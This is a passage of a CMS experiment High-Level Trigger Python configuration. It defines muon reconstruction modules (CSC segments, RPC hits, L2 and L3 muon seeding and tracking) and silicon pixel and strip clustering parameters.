cms.EDProducer( \"CSCSegmentProducer\",\n inputObjects = cms.InputTag( \"hltCsc2DRecHits\" ),\n algo_type = cms.int32( 1 ),\n algo_psets = cms.VPSet( \n cms.PSet( chamber_types = cms.vstring( 'ME1/a',\n 'ME1/b',\n 'ME1/2',\n 'ME1/3',\n 'ME2/1',\n 'ME2/2',\n 'ME3/1',\n 'ME3/2',\n 'ME4/1',\n 'ME4/2' ),\n algo_name = cms.string( \"CSCSegAlgoST\" ),\n parameters_per_chamber_type = cms.vint32( 2, 1, 1, 1, 1, 1, 1, 1, 1, 1 ),\n algo_psets = cms.VPSet( \n cms.PSet( maxRatioResidualPrune = cms.double( 3.0 ),\n yweightPenalty = cms.double( 1.5 ),\n maxRecHitsInCluster = cms.int32( 20 ),\n dPhiFineMax = cms.double( 0.025 ),\n preClusteringUseChaining = cms.bool( True ),\n ForceCovariance = cms.bool( False ),\n hitDropLimit6Hits = cms.double( 0.3333 ),\n NormChi2Cut2D = cms.double( 20.0 ),\n BPMinImprovement = cms.double( 10000.0 ),\n Covariance = cms.double( 0.0 ),\n tanPhiMax = cms.double( 0.5 ),\n SeedBig = cms.double( 0.0015 ),\n onlyBestSegment = cms.bool( False ),\n dRPhiFineMax = cms.double( 8.0 ),\n SeedSmall = cms.double( 2.0E-4 ),\n curvePenalty = cms.double( 2.0 ),\n dXclusBoxMax = cms.double( 4.0 ),\n BrutePruning = cms.bool( True ),\n curvePenaltyThreshold = cms.double( 0.85 ),\n CorrectTheErrors = cms.bool( True ),\n hitDropLimit4Hits = cms.double( 0.6 ),\n useShowering = cms.bool( False ),\n CSCDebug = cms.untracked.bool( False ),\n tanThetaMax = cms.double( 1.2 ),\n NormChi2Cut3D = cms.double( 10.0 ),\n minHitsPerSegment = cms.int32( 3 ),\n ForceCovarianceAll = cms.bool( False ),\n yweightPenaltyThreshold = cms.double( 1.0 ),\n prePrunLimit = cms.double( 3.17 ),\n hitDropLimit5Hits = cms.double( 0.8 ),\n preClustering = cms.bool( True ),\n prePrun = cms.bool( True ),\n maxDPhi = cms.double( 999.0 ),\n maxDTheta = cms.double( 999.0 ),\n Pruning = cms.bool( True ),\n dYclusBoxMax = cms.double( 8.0 )\n ),\n cms.PSet( maxRatioResidualPrune = cms.double( 3.0 ),\n yweightPenalty = cms.double( 1.5 ),\n maxRecHitsInCluster = cms.int32( 24 ),\n dPhiFineMax = cms.double( 0.025 ),\n preClusteringUseChaining = cms.bool( True ),\n ForceCovariance = cms.bool( False ),\n hitDropLimit6Hits = cms.double( 0.3333 ),\n NormChi2Cut2D = cms.double( 20.0 ),\n BPMinImprovement = cms.double( 10000.0 ),\n Covariance = cms.double( 0.0 ),\n tanPhiMax = cms.double( 0.5 ),\n SeedBig = cms.double( 0.0015 ),\n onlyBestSegment = cms.bool( False ),\n dRPhiFineMax = cms.double( 8.0 ),\n SeedSmall = cms.double( 2.0E-4 ),\n curvePenalty = cms.double( 2.0 ),\n dXclusBoxMax = cms.double( 4.0 ),\n BrutePruning = cms.bool( True ),\n curvePenaltyThreshold = cms.double( 0.85 ),\n CorrectTheErrors = cms.bool( True ),\n hitDropLimit4Hits = cms.double( 0.6 ),\n useShowering = cms.bool( False ),\n CSCDebug = cms.untracked.bool( False ),\n tanThetaMax = cms.double( 1.2 ),\n NormChi2Cut3D = cms.double( 10.0 ),\n minHitsPerSegment = cms.int32( 3 ),\n ForceCovarianceAll = cms.bool( False ),\n yweightPenaltyThreshold = cms.double( 1.0 ),\n prePrunLimit = cms.double( 3.17 ),\n hitDropLimit5Hits = cms.double( 0.8 ),\n preClustering = cms.bool( True ),\n prePrun = cms.bool( True ),\n maxDPhi = cms.double( 999.0 ),\n maxDTheta = cms.double( 999.0 ),\n Pruning = cms.bool( True ),\n dYclusBoxMax = cms.double( 8.0 )\n )\n )\n )\n )\n)\nhltMuonRPCDigis = cms.EDProducer( \"RPCUnpackingModule\",\n InputLabel = cms.InputTag( \"rawDataCollector\" ),\n doSynchro = cms.bool( False )\n)\nhltRpcRecHits = cms.EDProducer( \"RPCRecHitProducer\",\n rpcDigiLabel = cms.InputTag( \"hltMuonRPCDigis\" ),\n recAlgo = cms.string( \"RPCRecHitStandardAlgo\" ),\n 
maskSource = cms.string( \"File\" ),\n maskvecfile = cms.FileInPath( \"RecoLocalMuon/RPCRecHit/data/RPCMaskVec.dat\" ),\n deadSource = cms.string( \"File\" ),\n deadvecfile = cms.FileInPath( \"RecoLocalMuon/RPCRecHit/data/RPCDeadVec.dat\" ),\n recAlgoConfig = cms.PSet( )\n)\nhltL2MuonSeeds = cms.EDProducer( \"L2MuonSeedGenerator\",\n InputObjects = cms.InputTag( \"hltL1extraParticles\" ),\n GMTReadoutCollection = cms.InputTag( \"hltGtDigis\" ),\n Propagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n L1MinPt = cms.double( 0.0 ),\n L1MaxEta = cms.double( 2.5 ),\n L1MinQuality = cms.uint32( 1 ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'SteppingHelixPropagatorAny' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n )\n)\nhltL2Muons = cms.EDProducer( \"L2MuonProducer\",\n InputObjects = cms.InputTag( \"hltL2MuonSeeds\" ),\n L2TrajBuilderParameters = cms.PSet( \n DoRefit = cms.bool( False ),\n SeedPropagator = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n FilterParameters = cms.PSet( \n NumberOfSigma = cms.double( 3.0 ),\n FitDirection = cms.string( \"insideOut\" ),\n DTRecSegmentLabel = cms.InputTag( \"hltDt4DSegments\" ),\n MaxChi2 = cms.double( 1000.0 ),\n MuonTrajectoryUpdatorParameters = cms.PSet( \n MaxChi2 = cms.double( 25.0 ),\n RescaleErrorFactor = cms.double( 100.0 ),\n Granularity = cms.int32( 0 ),\n ExcludeRPCFromFit = cms.bool( False ),\n UseInvalidHits = cms.bool( True ),\n RescaleError = cms.bool( False )\n ),\n EnableRPCMeasurement = cms.bool( True ),\n CSCRecSegmentLabel = cms.InputTag( \"hltCscSegments\" ),\n EnableDTMeasurement = cms.bool( True ),\n RPCRecSegmentLabel = cms.InputTag( \"hltRpcRecHits\" ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n EnableCSCMeasurement = cms.bool( True )\n ),\n NavigationType = cms.string( \"Standard\" ),\n SeedTransformerParameters = cms.PSet( \n Fitter = cms.string( \"hltESPKFFittingSmootherForL2Muon\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n NMinRecHits = cms.uint32( 2 ),\n UseSubRecHits = cms.bool( False ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n RescaleError = cms.double( 100.0 )\n ),\n DoBackwardFilter = cms.bool( True ),\n SeedPosition = cms.string( \"in\" ),\n BWFilterParameters = cms.PSet( \n NumberOfSigma = cms.double( 3.0 ),\n CSCRecSegmentLabel = cms.InputTag( \"hltCscSegments\" ),\n FitDirection = cms.string( \"outsideIn\" ),\n DTRecSegmentLabel = cms.InputTag( \"hltDt4DSegments\" ),\n MaxChi2 = cms.double( 100.0 ),\n MuonTrajectoryUpdatorParameters = cms.PSet( \n MaxChi2 = cms.double( 25.0 ),\n RescaleErrorFactor = cms.double( 100.0 ),\n Granularity = cms.int32( 2 ),\n ExcludeRPCFromFit = cms.bool( False ),\n UseInvalidHits = cms.bool( True ),\n RescaleError = cms.bool( False )\n ),\n EnableRPCMeasurement = cms.bool( True ),\n BWSeedType = cms.string( \"fromGenerator\" ),\n EnableDTMeasurement = cms.bool( True ),\n RPCRecSegmentLabel = cms.InputTag( \"hltRpcRecHits\" ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n EnableCSCMeasurement = cms.bool( True )\n ),\n DoSeedRefit = cms.bool( False )\n ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'hltESPFastSteppingHelixPropagatorAny',\n 'hltESPFastSteppingHelixPropagatorOpposite' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n TrackLoaderParameters = cms.PSet( \n Smoother = cms.string( 
\"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n DoSmoothing = cms.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonUpdatorAtVertexParameters = cms.PSet( \n MaxChi2 = cms.double( 1000000.0 ),\n BeamSpotPosition = cms.vdouble( 0.0, 0.0, 0.0 ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorOpposite\" ),\n BeamSpotPositionErrors = cms.vdouble( 0.1, 0.1, 5.3 )\n ),\n VertexConstraint = cms.bool( True )\n )\n)\nhltL2MuonCandidates = cms.EDProducer( \"L2MuonCandidateProducer\",\n InputObjects = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' )\n)\nhltDimuonL2PreFiltered0 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 2 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 0.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( True ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltSiPixelDigis = cms.EDProducer( \"SiPixelRawToDigi\",\n IncludeErrors = cms.bool( False ),\n UseQualityInfo = cms.bool( False ),\n UseCablingTree = cms.untracked.bool( True ),\n Timing = cms.untracked.bool( False ),\n InputLabel = cms.InputTag( \"rawDataCollector\" )\n)\nhltSiPixelClusters = cms.EDProducer( \"SiPixelClusterProducer\",\n src = cms.InputTag( \"hltSiPixelDigis\" ),\n maxNumberOfClusters = cms.int32( 12000 ),\n payloadType = cms.string( \"HLT\" ),\n ClusterMode = cms.untracked.string( \"PixelThresholdClusterizer\" ),\n ChannelThreshold = cms.int32( 1000 ),\n SeedThreshold = cms.int32( 1000 ),\n ClusterThreshold = cms.double( 4000.0 ),\n VCaltoElectronGain = cms.int32( 65 ),\n VCaltoElectronOffset = cms.int32( -414 ),\n MissCalibrate = cms.untracked.bool( True ),\n SplitClusters = cms.bool( False )\n)\nhltSiPixelRecHits = cms.EDProducer( \"SiPixelRecHitConverter\",\n src = cms.InputTag( \"hltSiPixelClusters\" ),\n VerboseLevel = cms.untracked.int32( 0 ),\n CPE = cms.string( \"hltESPPixelCPEGeneric\" )\n)\nhltSiStripExcludedFEDListProducer = cms.EDProducer( \"SiStripExcludedFEDListProducer\",\n ProductLabel = cms.InputTag( \"rawDataCollector\" )\n)\nhltSiStripRawToClustersFacility = cms.EDProducer( \"SiStripRawToClusters\",\n ProductLabel = cms.InputTag( \"rawDataCollector\" ),\n Clusterizer = cms.PSet( \n ChannelThreshold = cms.double( 2.0 ),\n MaxSequentialBad = cms.uint32( 1 ),\n MaxSequentialHoles = cms.uint32( 0 ),\n Algorithm = cms.string( \"ThreeThresholdAlgorithm\" ),\n MaxAdjacentBad = cms.uint32( 0 ),\n QualityLabel = cms.string( \"\" ),\n SeedThreshold = cms.double( 3.0 ),\n ClusterThreshold = cms.double( 5.0 ),\n setDetId = cms.bool( True )\n ),\n Algorithms = cms.PSet( \n SiStripFedZeroSuppressionMode = cms.uint32( 4 ),\n CommonModeNoiseSubtractionMode = cms.string( \"Median\" ),\n PedestalSubtractionFedMode = cms.bool( True ),\n TruncateInSuppressor = cms.bool( True ),\n doAPVRestore = cms.bool( True ),\n useCMMeanMap = cms.bool( False )\n )\n)\nhltSiStripClusters = cms.EDProducer( \"MeasurementTrackerSiStripRefGetterProducer\",\n InputModuleLabel = cms.InputTag( \"hltSiStripRawToClustersFacility\" ),\n measurementTrackerName = cms.string( \"hltESPMeasurementTracker\" )\n)\nhltL3TrajSeedOIState = cms.EDProducer( \"TSGFromL2Muon\",\n PtCut = cms.double( 1.0 ),\n PCut = cms.double( 2.5 ),\n 
MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'hltESPSteppingHelixPropagatorOpposite',\n 'hltESPSteppingHelixPropagatorAlong' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n MuonTrackingRegionBuilder = cms.PSet( ),\n TkSeedGenerator = cms.PSet( \n propagatorCompatibleName = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n option = cms.uint32( 3 ),\n maxChi2 = cms.double( 40.0 ),\n errorMatrixPset = cms.PSet( \n atIP = cms.bool( True ),\n action = cms.string( \"use\" ),\n errorMatrixValuesPSet = cms.PSet( \n pf3_V12 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V13 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V11 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V14 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V15 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n yAxis = cms.vdouble( 0.0, 1.0, 1.4, 10.0 ),\n pf3_V33 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n zAxis = cms.vdouble( -3.14159, 3.14159 ),\n pf3_V44 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n xAxis = cms.vdouble( 0.0, 13.0, 30.0, 70.0, 1000.0 ),\n pf3_V22 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V23 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V45 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V55 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V34 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V35 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V25 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V24 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n )\n )\n ),\n propagatorName = cms.string( \"hltESPSteppingHelixPropagatorAlong\" ),\n manySeeds = cms.bool( False ),\n copyMuonRecHit = cms.bool( False ),\n ComponentName = cms.string( \"TSGForRoadSearch\" )\n ),\n TrackerSeedCleaner = cms.PSet( ),\n TSGFromMixedPairs = cms.PSet( ),\n TSGFromPixelTriplets = cms.PSet( ),\n TSGFromPixelPairs = cms.PSet( ),\n TSGForRoadSearchOI = cms.PSet( ),\n TSGForRoadSearchIOpxl = cms.PSet( ),\n TSGFromPropagation = cms.PSet( ),\n TSGFromCombinedHits = 
cms.PSet( )\n)\nhltL3TrackCandidateFromL2OIState = cms.EDProducer( \"CkfTrajectoryMaker\",\n trackCandidateAlso = cms.bool( True ),\n src = cms.InputTag( \"hltL3TrajSeedOIState\" ),\n TrajectoryBuilder = cms.string( \"hltESPMuonCkfTrajectoryBuilder\" ),\n TrajectoryCleaner = cms.string( \"hltESPTrajectoryCleanerBySharedHits\" ),\n NavigationSchool = cms.string( \"SimpleNavigationSchool\" ),\n RedundantSeedCleaner = cms.string( \"CachingSeedCleanerBySharedInput\" ),\n useHitsSplitting = cms.bool( False ),\n TransientInitialStateEstimatorParameters = cms.PSet( \n propagatorAlongTISE = cms.string( \"PropagatorWithMaterial\" ),\n numberMeasurementsForFit = cms.int32( 4 ),\n propagatorOppositeTISE = cms.string( \"PropagatorWithMaterialOpposite\" )\n ),\n doSeedingRegionRebuilding = cms.bool( False ),\n cleanTrajectoryAfterInOut = cms.bool( False ),\n maxNSeeds = cms.uint32( 100000 )\n)\nhltL3TkTracksFromL2OIState = cms.EDProducer( \"TrackProducer\",\n TrajectoryInEvent = cms.bool( True ),\n useHitsSplitting = cms.bool( False ),\n clusterRemovalInfo = cms.InputTag( \"\" ),\n alias = cms.untracked.string( \"\" ),\n Fitter = cms.string( \"hltESPKFFittingSmoother\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n src = cms.InputTag( \"hltL3TrackCandidateFromL2OIState\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n AlgorithmName = cms.string( \"undefAlgorithm\" ),\n NavigationSchool = cms.string( \"\" )\n)\nhltL3MuonsOIState = cms.EDProducer( \"L3MuonProducer\",\n MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n L3TrajBuilderParameters = cms.PSet( \n ScaleTECyFactor = cms.double( -1.0 ),\n GlbRefitterParameters = cms.PSet( \n TrackerSkipSection = cms.int32( -1 ),\n DoPredictionsOnly = cms.bool( False ),\n PropDirForCosmics = cms.bool( False ),\n HitThreshold = cms.int32( 1 ),\n MuonHitsOption = cms.int32( 1 ),\n Chi2CutRPC = cms.double( 1.0 ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n DTRecSegmentLabel = cms.InputTag( \"hltDt4DSegments\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n CSCRecSegmentLabel = cms.InputTag( \"hltCscSegments\" ),\n Chi2CutCSC = cms.double( 150.0 ),\n Chi2CutDT = cms.double( 10.0 ),\n RefitRPCHits = cms.bool( True ),\n SkipStation = cms.int32( -1 ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" ),\n TrackerSkipSystem = cms.int32( -1 )\n ),\n ScaleTECxFactor = cms.double( -1.0 ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n MuonTrackingRegionBuilder = cms.PSet( \n EtaR_UpperLimit_Par1 = cms.double( 0.25 ),\n EtaR_UpperLimit_Par2 = cms.double( 0.15 ),\n OnDemand = cms.double( -1.0 ),\n Rescale_Dz = cms.double( 3.0 ),\n vertexCollection = cms.InputTag( \"pixelVertices\" ),\n Rescale_phi = cms.double( 3.0 ),\n Eta_fixed = cms.double( 0.2 ),\n DeltaZ_Region = cms.double( 15.9 ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n PhiR_UpperLimit_Par2 = cms.double( 0.2 ),\n Eta_min = cms.double( 0.05 ),\n Phi_fixed = cms.double( 0.2 ),\n DeltaR = cms.double( 0.2 ),\n EscapePt = cms.double( 1.5 ),\n UseFixedRegion = cms.bool( False ),\n PhiR_UpperLimit_Par1 = cms.double( 0.6 ),\n Rescale_eta = cms.double( 3.0 ),\n Phi_min = cms.double( 0.05 ),\n UseVertex = cms.bool( 
False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" )\n ),\n RefitRPCHits = cms.bool( True ),\n PCut = cms.double( 2.5 ),\n TrackTransformer = cms.PSet( \n DoPredictionsOnly = cms.bool( False ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n RefitRPCHits = cms.bool( True ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" )\n ),\n GlobalMuonTrackMatcher = cms.PSet( \n Pt_threshold1 = cms.double( 0.0 ),\n DeltaDCut_3 = cms.double( 15.0 ),\n MinP = cms.double( 2.5 ),\n MinPt = cms.double( 1.0 ),\n Chi2Cut_1 = cms.double( 50.0 ),\n Pt_threshold2 = cms.double( 9.99999999E8 ),\n LocChi2Cut = cms.double( 0.0010 ),\n Eta_threshold = cms.double( 1.2 ),\n Quality_3 = cms.double( 7.0 ),\n Quality_2 = cms.double( 15.0 ),\n Chi2Cut_2 = cms.double( 50.0 ),\n Chi2Cut_3 = cms.double( 200.0 ),\n DeltaDCut_1 = cms.double( 40.0 ),\n DeltaRCut_2 = cms.double( 0.2 ),\n DeltaRCut_3 = cms.double( 1.0 ),\n DeltaDCut_2 = cms.double( 10.0 ),\n DeltaRCut_1 = cms.double( 0.1 ),\n Propagator = cms.string( \"hltESPSmartPropagator\" ),\n Quality_1 = cms.double( 20.0 )\n ),\n PtCut = cms.double( 1.0 ),\n TrackerPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n tkTrajLabel = cms.InputTag( \"hltL3TkTracksFromL2OIState\" )\n ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'hltESPSmartPropagatorAny',\n 'SteppingHelixPropagatorAny',\n 'hltESPSmartPropagator',\n 'hltESPSteppingHelixPropagatorOpposite' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n TrackLoaderParameters = cms.PSet( \n PutTkTrackIntoEvent = cms.untracked.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n SmoothTkTrack = cms.untracked.bool( False ),\n MuonSeededTracksInstance = cms.untracked.string( \"L2Seeded\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonUpdatorAtVertexParameters = cms.PSet( \n MaxChi2 = cms.double( 1000000.0 ),\n Propagator = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n BeamSpotPositionErrors = cms.vdouble( 0.1, 0.1, 5.3 )\n ),\n VertexConstraint = cms.bool( False ),\n DoSmoothing = cms.bool( True )\n )\n)\nhltL3TrajSeedOIHit = cms.EDProducer( \"TSGFromL2Muon\",\n PtCut = cms.double( 1.0 ),\n PCut = cms.double( 2.5 ),\n MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'PropagatorWithMaterial',\n 'hltESPSmartPropagatorAnyOpposite' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n MuonTrackingRegionBuilder = cms.PSet( ),\n TkSeedGenerator = cms.PSet( \n PSetNames = cms.vstring( 'skipTSG',\n 'iterativeTSG' ),\n L3TkCollectionA = cms.InputTag( \"hltL3MuonsOIState\" ),\n iterativeTSG = cms.PSet( \n ErrorRescaling = cms.double( 3.0 ),\n beamSpot = cms.InputTag( \"offlineBeamSpot\" ),\n MaxChi2 = cms.double( 40.0 ),\n errorMatrixPset = cms.PSet( \n atIP = cms.bool( True ),\n action = cms.string( \"use\" ),\n errorMatrixValuesPSet = cms.PSet( \n pf3_V12 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V13 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V11 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V14 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V15 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n yAxis = cms.vdouble( 0.0, 1.0, 1.4, 10.0 ),\n pf3_V33 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n zAxis = cms.vdouble( -3.14159, 3.14159 ),\n pf3_V44 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n xAxis = cms.vdouble( 0.0, 13.0, 30.0, 70.0, 1000.0 ),\n pf3_V22 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V23 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V45 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V55 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 3.0, 3.0, 3.0, 5.0, 4.0, 5.0, 10.0, 7.0, 10.0, 10.0, 10.0, 10.0 )\n ),\n pf3_V34 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V35 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V25 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n ),\n pf3_V24 = cms.PSet( \n action = cms.string( \"scale\" ),\n values = cms.vdouble( 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 )\n )\n )\n ),\n UpdateState = cms.bool( True ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n SelectState = cms.bool( False ),\n SigmaZ = cms.double( 25.0 ),\n ResetMethod = cms.string( \"matrix\" ),\n ComponentName = cms.string( \"TSGFromPropagation\" ),\n UseVertexState = cms.bool( True ),\n Propagator = cms.string( \"hltESPSmartPropagatorAnyOpposite\" )\n ),\n skipTSG = cms.PSet( ),\n ComponentName = cms.string( \"DualByL2TSG\" )\n ),\n TrackerSeedCleaner = cms.PSet( \n cleanerFromSharedHits = cms.bool( True ),\n ptCleaner = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n directionCleaner = cms.bool( True )\n ),\n TSGFromMixedPairs = cms.PSet( ),\n TSGFromPixelTriplets = cms.PSet( ),\n TSGFromPixelPairs = 